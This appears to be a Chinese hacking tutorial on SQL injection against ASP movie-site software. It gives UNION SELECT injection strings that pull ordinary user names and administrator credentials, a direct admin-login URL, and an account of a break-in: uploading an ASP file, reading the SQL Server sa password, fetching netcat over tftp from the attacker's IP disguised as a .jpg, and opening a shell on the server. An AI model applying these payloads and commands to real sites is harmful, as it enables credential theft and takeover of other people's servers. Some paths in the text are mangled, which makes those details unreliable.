SQL注入奇招致胜 Union查询轻松看电影

呵呵，程序无条件的执行了，因为被 or ‘1=1'跳过后面的验证了。可是网站用户名也不是轻易得到的啊。别急，得到用户名一样简单。如下：在"你注册问题"处随便处填几个字母或数字，最好别有符号，轻易影响结果: 比如字母a密码提示问题处和上面一样，随便填：我也填个a要害是在密码提示答案：我填的是a' union select userid from users where oklook>=3 or '0上面就是要找黄金用户的帐户名，看到用户名后再用前面的方法找到密码。可以在where后面加很多参数并赋不同的值可以得到很多帐户。按上面的填入后输入语句就变成了：

select password from users

where userid=‘a‘ and city=‘a‘ and 

adress=' a' union select  userid  from users  where oklook>=3 or '0 ‘

细心的读者看到这可能已经想到怎样得到治理员的帐号和密码，不错，也很简单。我也不写过程了，直接写出语句如下：

得到帐号：

select password from users

where userid=‘a‘ and city=‘a‘ and adress=' a' 

union select  name  from okwiantgo  where  id>=1 or '0 ‘

得到密码：

select password from users 

where userid=‘a‘ and city=‘a‘ and adress=' a' 

union select  pwd  from okwiantgo  where  id>=1 or '0 ‘

然后登陆就行了，路径格式为：

http://网站电影路径/findaccout.asp?name=治理员帐号&pwd=治理员密码

回车，很轻松就进治理界面了。有时findaccount.asp可能被改名了，这时只能拿个黄金帐户了。

这个漏洞有很多电影程序有，有的程序表名不是okwiantgo（程序会报告64行属性不对），改成admin或password.,把上面的输入稍微修改一下行了。这样一来不管是多复杂的密码,或者是中文密码都没问题。再猜治理员帐户的时候也要多，where后面的条件多变化才行，否则可能得不到超级治理员。

这个漏洞使用很简单，危害极大，轻易可以得到治理员帐户。假如系统配置不当，在upload/uploadmovie.asp答应上传ASP文件，系统就很轻易换主人了。我曾经成功渗透过这样一个网站，简单过程叙述如下。

上传一个ASP程序，发现该系统运行SQLSERVER，通过读源文件看到了sa的密码，用sqlexec连接，tftp上传nc.exe。再次dir发现nc被删了，有防火强。用tftp上传nc.jpg肯定万无一失， tftp -i 我的IP get nc.exe nc.jpg,上传成功。在sqlexec运行

nc.jpg -l -p 99 -e  cwinntsystem32cmd.exe